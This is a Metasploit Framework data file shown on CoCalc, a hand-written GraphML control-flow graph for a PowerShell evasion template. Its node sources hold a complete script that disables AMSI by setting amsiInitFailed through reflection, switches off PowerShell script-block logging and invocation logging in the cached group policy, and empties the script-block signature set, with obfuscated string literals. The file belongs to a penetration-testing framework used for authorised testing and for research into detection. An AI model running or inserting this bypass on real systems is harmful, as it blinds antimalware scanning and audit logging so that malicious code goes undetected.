CoCalc -- bypass_powershell_protections.erb.graphml

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/data/evasion/windows/bypass_powershell_protections.erb.graphml
Views: ¹¹⁷⁸⁰
<?xml version="1.0" ?>
<!--
  This file was generated by hand since no automated analysis and generation tool currently exists for Powershell code.
-->
<graphml xmlns="http://graphml.graphdrawing.org/xmlns" xmlns:xsi="http://graphml.graphdrawing.org/xmlns" xsi:schemaLocation="http://graphml.graphdrawing.org/xmlns http://graphml.graphdrawing.org/xmlns/1.0/graphml.xsd">
  <key id="address" for="all" attr.name="address" attr.type="long"/>
  <key id="type" for="all" attr.name="type" attr.type="string"/>
  <key id="instruction.source" for="node" attr.name="instruction.source" attr.type="string"/>
  <key id="instruction.hex" for="node" attr.name="instruction.hex" attr.type="string"/>
  <graph edgedefault="directed">
    <node id="block.1">
      <data key="address">1</data>
      <data key="type">block</data>
      <graph edgedefault="directed">
        <data key="address">1</data>
        <data key="type">block</data>
        <node id="block.1:instruction.1">
          <data key="address">1</data>
          <data key="type">instruction</data>
          <data key="instruction.source">If($PSVersionTable.PSVersion.Major -ge 3){</data>
        </node>
        <node id="block.1:instruction.2">
          <data key="address">2</data>
          <data key="type">instruction</data>
          <data key="instruction.source">    $val=[Collections.Generic.Dictionary[string,System.Object]]::new();</data>
        </node>
        <node id="block.1:instruction.3">
          <data key="address">3</data>
          <data key="type">instruction</data>
          <data key="instruction.source">    $Ref1=[Ref].Assembly.GetType(&lt;%= Rex::Powershell::Obfu.scate_string_literal('System.Management.Automation.AmsiUtils', threshold: 0.3) %&gt;);</data>
        </node>
        <node id="block.1:instruction.4">
          <data key="address">4</data>
          <data key="type">instruction</data>
          <data key="instruction.source">    if ($Ref1) { $Ref1.GetField(&lt;%= Rex::Powershell::Obfu.scate_string_literal('amsiInitFailed', threshold: 0.3) %&gt;,'NonPublic,Static').SetValue($null,$true); };</data>
        </node>
        <node id="block.1:instruction.5">
          <data key="address">5</data>
          <data key="type">instruction</data>
          <data key="instruction.source">    $Ref2=[Ref].Assembly.GetType(&lt;%= Rex::Powershell::Obfu.scate_string_literal('System.Management.Automation.Utils') %&gt;);</data>
        </node>
        <node id="block.1:instruction.6">
          <data key="address">6</data>
          <data key="type">instruction</data>
          <data key="instruction.source">    $GPF=$Ref2.GetField('cachedGroupPolicySettings','NonPublic,Static');</data>
        </node>
        <node id="block.1:instruction.7">
          <data key="address">7</data>
          <data key="type">instruction</data>
          <data key="instruction.source">    If ($GPF) {</data>
        </node>
        <node id="block.1:instruction.8">
          <data key="address">8</data>
          <data key="type">instruction</data>
          <data key="instruction.source">        $SBL=&lt;%= Rex::Powershell::Obfu.scate_string_literal('ScriptBlockLogging') %&gt;;</data>
        </node>
        <node id="block.1:instruction.9">
          <data key="address">9</data>
          <data key="type">instruction</data>
          <data key="instruction.source">        $EnableSBL=&lt;%= Rex::Powershell::Obfu.scate_string_literal('EnableScriptBlockLogging') %&gt;;</data>
        </node>
        <node id="block.1:instruction.10">
          <data key="address">10</data>
          <data key="type">instruction</data>
          <data key="instruction.source">        $EnableSBIL=&lt;%= Rex::Powershell::Obfu.scate_string_literal('EnableScriptBlockInvocationLogging') %&gt;;</data>
        </node>
        <node id="block.1:instruction.11">
          <data key="address">11</data>
          <data key="type">instruction</data>
          <data key="instruction.source">        $GPC=$GPF.GetValue($null);</data>
        </node>
        <edge source="block.1:instruction.1" target="block.1:instruction.3"/>
        <edge source="block.1:instruction.1" target="block.1:instruction.5"/>
        <edge source="block.1:instruction.3" target="block.1:instruction.4"/>
        <edge source="block.1:instruction.4" target="block.1:instruction.7"/>
        <edge source="block.1:instruction.5" target="block.1:instruction.6"/>
        <edge source="block.1:instruction.6" target="block.1:instruction.7"/>
        <edge source="block.1:instruction.7" target="block.1:instruction.11"/>
      </graph>
    </node>
    <node id="block.12">
      <data key="address">12</data>
      <data key="type">block</data>
      <graph edgedefault="directed">
        <data key="address">12</data>
        <data key="type">block</data>
        <node id="block.12:instruction.12">
          <data key="address">12</data>
          <data key="type">instruction</data>
          <data key="instruction.source">        If($GPC[$SBL]){</data>
        </node>
        <node id="block.12:instruction.13">
          <data key="address">13</data>
          <data key="type">instruction</data>
          <data key="instruction.source">            $GPC[$SBL][$EnableSBL]=0;</data>
        </node>
        <node id="block.12:instruction.14">
          <data key="address">14</data>
          <data key="type">instruction</data>
          <data key="instruction.source">            $GPC[$SBL][$EnableSBIL]=0;</data>
        </node>
        <node id="block.12:instruction.15">
          <data key="address">15</data>
          <data key="type">instruction</data>
          <data key="instruction.source">        }</data>
        </node>
        <edge source="block.12:instruction.12" target="block.12:instruction.13"/>
        <edge source="block.12:instruction.12" target="block.12:instruction.14"/>
        <edge source="block.12:instruction.13" target="block.12:instruction.15"/>
        <edge source="block.12:instruction.14" target="block.12:instruction.15"/>
      </graph>
    </node>
    <node id="block.16">
      <data key="address">16</data>
      <data key="type">block</data>
      <graph edgedefault="directed">
        <data key="address">16</data>
        <data key="type">block</data>
        <node id="block.16:instruction.16">
          <data key="address">16</data>
          <data key="type">instruction</data>
          <data key="instruction.source">        $val.Add($EnableSBL,0);</data>
        </node>
        <node id="block.16:instruction.17">
          <data key="address">17</data>
          <data key="type">instruction</data>
          <data key="instruction.source">        $val.Add($EnableSBIL,0);</data>
        </node>
        <node id="block.16:instruction.18">
          <data key="address">18</data>
          <data key="type">instruction</data>
          <data key="instruction.source">        $GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\'+$SBL]=$val;</data>
        </node>
        <edge source="block.16:instruction.16" target="block.16:instruction.18"/>
        <edge source="block.16:instruction.17" target="block.16:instruction.18"/>
      </graph>
    </node>
    <node id="block.19">
      <data key="address">19</data>
      <data key="type">block</data>
      <graph edgedefault="directed">
        <data key="address">19</data>
        <data key="type">block</data>
        <node id="block.19:instruction.19">
          <data key="address">19</data>
          <data key="type">instruction</data>
          <data key="instruction.source">    } Else {</data>
        </node>
        <node id="block.19:instruction.20">
          <data key="address">20</data>
          <data key="type">instruction</data>
          <data key="instruction.source">        [Ref].Assembly.GetType(&lt;%= Rex::Powershell::Obfu.scate_string_literal('System.Management.Automation.ScriptBlock') %&gt;).GetField('signatures','NonPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string]));</data>
        </node>
        <node id="block.19:instruction.21">
          <data key="address">21</data>
          <data key="type">instruction</data>
          <data key="instruction.source">    }</data>
        </node>
        <node id="block.19:instruction.22">
          <data key="address">22</data>
          <data key="type">instruction</data>
          <data key="instruction.source">};</data>
        </node>
        <edge source="block.19:instruction.19" target="block.19:instruction.20"/>
        <edge source="block.19:instruction.20" target="block.19:instruction.21"/>
        <edge source="block.19:instruction.21" target="block.19:instruction.22"/>
      </graph>
    </node>
    <edge source="block.1" target="block.12"/>
    <edge source="block.1" target="block.16"/>
    <edge source="block.12" target="block.19"/>
    <edge source="block.16" target="block.19"/>
  </graph>
</graphml>
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

Product

Resources

Company

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more, all in one place.

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
